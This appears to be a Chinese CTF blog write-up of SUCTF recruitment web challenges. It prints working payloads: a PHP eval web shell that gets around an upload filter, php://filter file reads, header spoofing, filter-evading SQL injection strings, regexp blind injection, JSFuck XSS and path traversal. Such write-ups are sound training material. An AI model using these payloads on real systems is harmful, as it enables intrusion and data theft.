<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ctf,">










<meta name="description" content="招新赛这段时间刚好撞上一堆其他比赛，肉鸡肝不动了，趁着这几天平台还没关赶紧做一下。   where are you from level1这题点进去看见hello from + 本机ip地址，而且提示only guest from 127.0.0.1 can get flag of level1，抓包将client-ip改成127.0.0.1就有flag了   include me这题点进去可以看">
<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="suctf招新赛wp">
<meta property="og:url" content="https://xi4or0uji.github.io/2019/01/17/2018-11-15-suctf招新赛wp/index.html">
<meta property="og:site_name" content="蒟蒻的ctf博客">
<meta property="og:description" content="招新赛这段时间刚好撞上一堆其他比赛，肉鸡肝不动了，趁着这几天平台还没关赶紧做一下。   where are you from level1这题点进去看见hello from + 本机ip地址，而且提示only guest from 127.0.0.1 can get flag of level1，抓包将client-ip改成127.0.0.1就有flag了   include me这题点进去可以看">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/1.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/2.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/3.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/4.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/5.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/6.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/7.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/9.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/10.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/8.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/11.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/12.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/13.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/14.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/15.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/16.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/17.png">
<meta property="og:image" content="https://xi4or0uji.github.io/images/suctf_new/18.png">
<meta property="og:updated_time" content="2019-01-17T08:36:05.766Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="suctf招新赛wp">
<meta name="twitter:description" content="招新赛这段时间刚好撞上一堆其他比赛，肉鸡肝不动了，趁着这几天平台还没关赶紧做一下。   where are you from level1这题点进去看见hello from + 本机ip地址，而且提示only guest from 127.0.0.1 can get flag of level1，抓包将client-ip改成127.0.0.1就有flag了   include me这题点进去可以看">
<meta name="twitter:image" content="https://xi4or0uji.github.io/images/suctf_new/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://xi4or0uji.github.io/2019/01/17/2018-11-15-suctf招新赛wp/">





  <title>suctf招新赛wp | 蒟蒻的ctf博客</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">蒟蒻的ctf博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://xi4or0uji.github.io/2019/01/17/2018-11-15-suctf招新赛wp/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Xi4or0uji">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="蒟蒻的ctf博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">suctf招新赛wp</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-01-17T16:24:52+08:00">
                2019-01-17
              </time>
            

            

            
          </span>
		  


          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/web/" itemprop="url" rel="index">
                    <span itemprop="name">web</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2019/01/17/2018-11-15-suctf招新赛wp/" class="leancloud_visitors" data-flag-title="suctf招新赛wp">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>招新赛这段时间刚好撞上一堆其他比赛，肉鸡肝不动了，趁着这几天平台还没关赶紧做一下。  </p>
<h3 id="where-are-you-from-level1"><a href="#where-are-you-from-level1" class="headerlink" title="where are you from level1"></a>where are you from level1</h3><p>这题点进去看见hello from + 本机ip地址，而且提示only guest from 127.0.0.1 can get flag of level1，抓包将client-ip改成127.0.0.1就有flag了  </p>
<h3 id="include-me"><a href="#include-me" class="headerlink" title="include me"></a>include me</h3><p>这题点进去可以看到一个改变语言的选择框，选下其他的发现除了语言有变化，网站连接的后面lang的值也会改变，可以想到这是一个文件包含的点<br><img src="/images/suctf_new/1.png" alt=""><br>尝试一下进行伪协议利用，?lang=php://filter/read/convert.base64-encode/resource=index.php，发现确实可以进行文件读取，解密就有flag了<br><img src="/images/suctf_new/2.png" alt=""></p>
<h3 id="yunpan"><a href="#yunpan" class="headerlink" title="yunpan"></a>yunpan</h3><p>这个网站点进去可以看到一堆的文件，点开后面几个视频将它们下下来，看了一下，都是葫芦娃，没看出什么，点开readme.txt也只是一堆的嘤嘤嘤…….仔细看看，发现有个302<br><img src="/images/suctf_new/3.png" alt=""><br>解密一下这堆base64，发现正好是readme.txt，将flag.php解密一下发过去，发现有个flag.php下下来，打开就有flag了  </p>
<h3 id="onepiece"><a href="#onepiece" class="headerlink" title="onepiece"></a>onepiece</h3><p>这题点开看见网页显示用了phpstorm，想一下平时我们用phpstorm的时候总是会有一个.idea文件，尝试一下在链接后面加.idea，发现一堆文件<br><img src="/images/suctf_new/4.png" alt=""><br>将他们下下来发现里面有UpL0ad.php、README.html、index.php<br>访问UpL0ad.php是一个文件上传的地方<br>访问一下readme.html看见<br><img src="/images/suctf_new/5.png" alt=""><br>于是在链接后面加个onepiece.zip，发现有文件下下来，里面有个jiami.php，打开看见一堆混淆代码，找个网站解密一下 <a href="https://tool.lu/php" target="_blank" rel="noopener">https://tool.lu/php</a> ，可以看见<br><img src="/images/suctf_new/6.png" alt=""><br>很明显的变量覆盖，在upload.php页面上抓包将file的变量改成flag就拿到flag了  </p>
<h3 id="easy-upload"><a href="#easy-upload" class="headerlink" title="easy_upload"></a>easy_upload</h3><p>这题很明显的文件上传漏洞，尝试一下上传php文件，嗯，确实触发waf了，只允许传png文件，改下content-type成image/png，然后再把后缀改成phtml就可以上传文件了，但是却回显不能包含&lt;?php，这里用javascript去绕过<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;head&gt;</span><br><span class="line">&lt;script language=<span class="string">"php"</span>&gt;</span><br><span class="line"><span class="built_in">eval</span>($_POST[<span class="string">"cmd"</span>]);</span><br><span class="line">&lt;<span class="regexp">/script&gt;  </span></span><br><span class="line"><span class="regexp">&lt;/</span>head&gt;</span><br></pre></td></tr></table></figure></p>
<p>发现成功上传文件，菜刀连过去打开flag.php就有flag了<br><img src="/images/suctf_new/7.png" alt=""></p>
<h3 id="baby-upload"><a href="#baby-upload" class="headerlink" title="baby_upload"></a>baby_upload</h3><p>这题也是文件上传的题目，点进去尝试一下传个php文件，也是只能传图片，想传个php文件然后改变绕过，结果发现开着代理刚选完文件就弹只能选图片，看来前端有个js检测文件的，看下源码确实是有<br><img src="/images/suctf_new/9.png" alt=""><br>想禁用了火狐的js然后再改包，可是不知道为什么禁用了还是发不了包，只能先发一个图片的包然后改，最后改了content-type和后缀成phps再加一句shell语句就能成功get flag了<br><img src="/images/suctf_new/10.png" alt=""><br><img src="/images/suctf_new/8.png" alt=""></p>
<h3 id="php-is-No-1"><a href="#php-is-No-1" class="headerlink" title="php is No.1"></a>php is No.1</h3><p>点进去看见一堆源码<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">'flag.php'</span>;</span><br><span class="line"><span class="keyword">isset</span>($_GET[<span class="string">'time'</span>])?$time = $_GET[<span class="string">'time'</span>]:$time = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">isset</span>($_GET[<span class="string">'num'</span>])?$num = $_GET[<span class="string">'num'</span>]:$num = <span class="number">0</span>;</span><br><span class="line">$c=is_numeric($time) <span class="keyword">and</span> is_numeric($num);</span><br><span class="line"><span class="keyword">if</span> ($num == <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span>($num)&#123;</span><br><span class="line">        <span class="keyword">if</span>($c)&#123;</span><br><span class="line">            <span class="keyword">if</span>(!is_numeric($time))</span><br><span class="line">                <span class="keyword">echo</span> <span class="string">'Time time must be number'</span>;</span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span> ($time &lt; <span class="number">60</span> * <span class="number">60</span> * <span class="number">24</span> * <span class="number">30</span> * <span class="number">1</span>)</span><br><span class="line">                <span class="keyword">echo</span> <span class="string">'This time is too short'</span>;</span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span> ($time &gt; <span class="number">60</span> * <span class="number">60</span> * <span class="number">24</span> * <span class="number">30</span> * <span class="number">2</span>)</span><br><span class="line">                <span class="keyword">echo</span> <span class="string">'This time is too long'</span>;</span><br><span class="line">            <span class="keyword">else</span>&#123;</span><br><span class="line">                sleep((int)$time);</span><br><span class="line">                <span class="keyword">echo</span> $flag;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            <span class="keyword">echo</span> <span class="string">'Try again'</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'Try again'</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'Try again'</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'&lt;hr&gt;'</span>;</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>简单来说，就是要传两个值，一个num一个time，然后num要是数字且等于0，然后time的值必须在2592000和5184000之间，如果符合让浏览器sleep time的时间，然后再输出flag，显然直接让浏览器睡这么长是不现实的，所以我们要用科学计数法绕过，至于num，就用%00截断，或者输个字符也行<br><img src="/images/suctf_new/11.png" alt="">   </p>
<h3 id="where-are-you-from-level2"><a href="#where-are-you-from-level2" class="headerlink" title="where are you from level2"></a>where are you from level2</h3><p>这里我们要先看level1出来的源码<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getIp</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(!<span class="keyword">empty</span>($_SERVER[<span class="string">'HTTP_CLIENT_IP'</span>]))&#123;</span><br><span class="line">        $cip=$_SERVER[<span class="string">'HTTP_CLIENT_IP'</span>];</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">elseif</span>(!<span class="keyword">empty</span>($_SERVER[<span class="string">'HTTP_X_FORWARDED_FOR'</span>]))&#123;</span><br><span class="line">        $cip=$_SERVER[<span class="string">'HTTP_X_FORWARDED_FOR'</span>];</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">elseif</span>(!<span class="keyword">empty</span>($_SERVER[<span class="string">'REMOTE_ADDR'</span>]))&#123;</span><br><span class="line">        $cip=$_SERVER[<span class="string">'REMOTE_ADDR'</span>];</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        $cip=<span class="string">''</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    $cip=preg_replace(<span class="string">'/\s|select|from|limit|union|join/iU'</span>,<span class="string">''</span>,$cip);</span><br><span class="line">    <span class="keyword">return</span> $cip;</span><br><span class="line">&#125;</span><br><span class="line"> $query=$mysqli-&gt;query(<span class="string">"insert into ip_records(ip,time) values ('$ip','$time')"</span>);</span><br></pre></td></tr></table></figure></p>
<p>可以看到，select等关键字被过滤了，但是可以用重写去绕过，剩下的就是注入了<br>Client-Ip: 12’,(selselectect/<strong>/database()))#<br><img src="/images/suctf_new/12.png" alt=""><br>Client-Ip: 12’,(selselectect/</strong>/group_concat(table_name)/<strong>/ffromrom/</strong>/information_schema.tables/<strong>/where/</strong>/table_schema=database()))#<br><img src="/images/suctf_new/13.png" alt=""><br>Client-Ip: 12’,(selselectect/<strong>/group_concat(column_name)/</strong>/ffromrom/<strong>/information_schema.columns/</strong>/where/<strong>/table_name=’flaaag’))#<br><img src="/images/suctf_new/14.png" alt=""><br>Client-Ip: 12’,(selselectect/</strong>/fl4g/<strong>/ffromrom/</strong>/flaaag))#<br><img src="/images/suctf_new/15.png" alt=""><br>好了，flag就出来了  </p>
<h3 id="classic-sqli"><a href="#classic-sqli" class="headerlink" title="classic sqli"></a>classic sqli</h3><p>源码<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="keyword">include</span> <span class="string">"./config.php"</span>;</span><br><span class="line"><span class="keyword">include</span> <span class="string">"./flag.php"</span>;</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">$black_list = <span class="string">"/guest|limit|substr|mid|like|or|char|union|select|greatest|\'|"</span>;</span><br><span class="line">$black_list .= <span class="string">"=|_| |in|&lt;|&gt;|-|\.|\(|\)|#|and|if|database|where|concat|insert|having|sleep/i"</span>;</span><br><span class="line"><span class="keyword">if</span>(preg_match($black_list, $_GET[<span class="string">'user'</span>])) <span class="keyword">exit</span>(<span class="string">"Hacker detected!"</span>); </span><br><span class="line"><span class="keyword">if</span>(preg_match($black_list, $_GET[<span class="string">'pw'</span>])) <span class="keyword">exit</span>(<span class="string">"Hacker detected!"</span>); </span><br><span class="line">$query=<span class="string">"select user from chal where user='$_GET[user]' and pw='$_GET[pw]'"</span>; </span><br><span class="line">$result = mysqli_query($link, $query);</span><br><span class="line">$result = mysqli_fetch_array($result);</span><br><span class="line">$admin_pass = mysqli_fetch_array(mysqli_query($link, <span class="string">"select pw from chal where user='admin'"</span>));</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;h1&gt;query : &lt;strong&gt;&lt;b&gt;&#123;$query&#125;&lt;/b&gt;&lt;/strong&gt;&lt;br&gt;&lt;/h1&gt;"</span>;</span><br><span class="line"><span class="keyword">if</span>($result[<span class="string">'user'</span>]) <span class="keyword">echo</span> <span class="string">"&lt;h2&gt;Bonjour!, &#123;$result['user']&#125;&lt;/h2&gt;"</span>; </span><br><span class="line"><span class="keyword">if</span>(($admin_pass[<span class="string">'pw'</span>])&amp;&amp;($admin_pass[<span class="string">'pw'</span>] === $_GET[<span class="string">'pw'</span>]))&#123;</span><br><span class="line">        <span class="keyword">echo</span> $flag;</span><br><span class="line">    &#125;</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>); </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>这题是正则表达式盲注，过滤了很多东西，普通的盲注基本是不可能的了，只能进行正则盲注获得管理员的密码。<br>利用regexp去匹配正则表达式，用/**/代替空格，最后用%00进行截断<br>payload:<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?user=\&amp;pw=^0%26%26user/**/regexp/**/0x61646d696e%26%26pw/**/regexp/**/%22^&#123;&#125;%22;%00</span><br></pre></td></tr></table></figure></p>
<p>肉鸡技术太差，脚本报了个错，最后只能用burp去进行注入了（逃<br>这里就不贴脚本了，最后爆出密码是1adpmh105i31，登录就完事了  </p>
<h3 id="xss1"><a href="#xss1" class="headerlink" title="xss1"></a>xss1</h3><p>源码<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params">input</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">while</span> (input.indexOf(<span class="string">'alert'</span>) &gt;= <span class="number">0</span>) &#123;</span><br><span class="line">        input = input.replace(<span class="regexp">/(alert)+/g</span>, <span class="string">''</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    input = <span class="string">'console.log("'</span> + input + <span class="string">'");'</span>;</span><br><span class="line">    <span class="keyword">var</span> script = <span class="built_in">document</span>.createElement(<span class="string">'script'</span>);</span><br><span class="line">    script.innerText = input;</span><br><span class="line">    <span class="built_in">document</span>.body.appendChild(script);</span><br><span class="line">&#125;</span><br><span class="line">&lt;<span class="regexp">/script&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>这道题题目提示说alert(1)就行，但是可以看见，无论有多少个alert，js代码都会将它去掉，因此我们只能用其他的办法进行绕过，这里用jsfuck编码构造payload，只要闭合了前面的console.log，再注释掉后面的符号就可以弹1了<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">");[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])();//</span></span><br></pre></td></tr></table></figure></p>
<p>好了，flag get√<br><img src="/images/suctf_new/16.png" alt=""> </p>
<h3 id="gallery"><a href="#gallery" class="headerlink" title="gallery"></a>gallery</h3><p>未完待续，先让肉鸡搞懂先</p>
<h3 id="xss2"><a href="#xss2" class="headerlink" title="xss2"></a>xss2</h3><p>源码<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params">input</span>) </span>&#123;</span><br><span class="line">    input = input.replace(<span class="regexp">/[^\[\]\!\+]+/g</span>, <span class="string">''</span>);</span><br><span class="line">    <span class="built_in">console</span>.log(<span class="string">'Filtered input: '</span> + input);</span><br><span class="line">    <span class="built_in">eval</span>(<span class="built_in">eval</span>(input) + <span class="string">'(1)'</span>);</span><br><span class="line">&#125;</span><br><span class="line">&lt;<span class="regexp">/script&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>可以看到，正则表达式只允许[]和!，因此我们还是回到jsfuck编码的利用<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">a: [![]+[]][+[]][+!![]]</span><br><span class="line">l: [![]+[]][+[]][!+[]+!+[]]</span><br><span class="line">e: [![]+[]][+[]][!+[]+!+[]+!+[]+!+[]]</span><br><span class="line">r: [!![]+[]][+[]][+!+[]]</span><br><span class="line">t: [!![]+[]][+[]][+[]]</span><br></pre></td></tr></table></figure></p>
<p>将他们加起来就是payload了<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[![]+[]][+[]][+!![]]+[![]+[]][+[]][!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[!![]+[]][+[]][+!+[]]+[!![]+[]][+[]][+[]]</span><br></pre></td></tr></table></figure></p>
<h3 id="403readfile"><a href="#403readfile" class="headerlink" title="403readfile"></a>403readfile</h3><p>这题进去看到一个非常非常真的403页面，但是看下状态码是200，嗯，搞事情啊<br>然后扫下后台看见有个robots.txt，访问看一下有两个disallow，一个是flag.php，一个是get.php<br>估计也是文件包含什么的了，果然点开get.php看见里面有个链接，点了以后有个file，没错了，就是这里了，最初的链接是./1.txt，发现去掉./直接访问1.txt也可以找到文件，大胆猜测是不是过滤了./，果然，尝试一下访问in./dex.php也是可以正常回显的，确定是过滤./了，访问一下fl./ag.php发现文件找不到，emmm，尝试一下上一个目录，?file=…//fla./g.php，然后就发现拿到flag了<br><img src="/images/suctf_new/17.png" alt=""> </p>
<h3 id="secure-html"><a href="#secure-html" class="headerlink" title="secure html"></a>secure html</h3><p>这题后台的思路是secure_html.php先给你一个输入框，然后你在里面写东西，然后就根据你的session去创建一个对应的html文件，放在pages目录下，然后再将新建的html文件的内容插入secure_html.php的开头<br>因为自己创建的html的内容的可控的，所以我们只需要在里面插入php代码，然后执行就可以实现任意命令执行了，但是尝试一下发现secure_html.php对php过滤的很严格，就算是转成script去写也是会被过滤掉…emmm…看来此路不通=_=<br>这里插一个知识点，在nginx开启了webdav模块的时候是支持用http方法中的PUT方法更新文件的，所以我们可以尝试一下将php语句写进去已经创建了的html文件<br>这里的flag文件是在根目录<br><img src="/images/suctf_new/18.png" alt=""><br>这样我们就将php语句写进去html文件了，再次访问secure_html.php文件也就可以拿到flag了</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"># ctf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/01/17/2018-11-14-你拿不到我的源码/" rel="next" title="你拿不到我的源码">
                <i class="fa fa-chevron-left"></i> 你拿不到我的源码
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
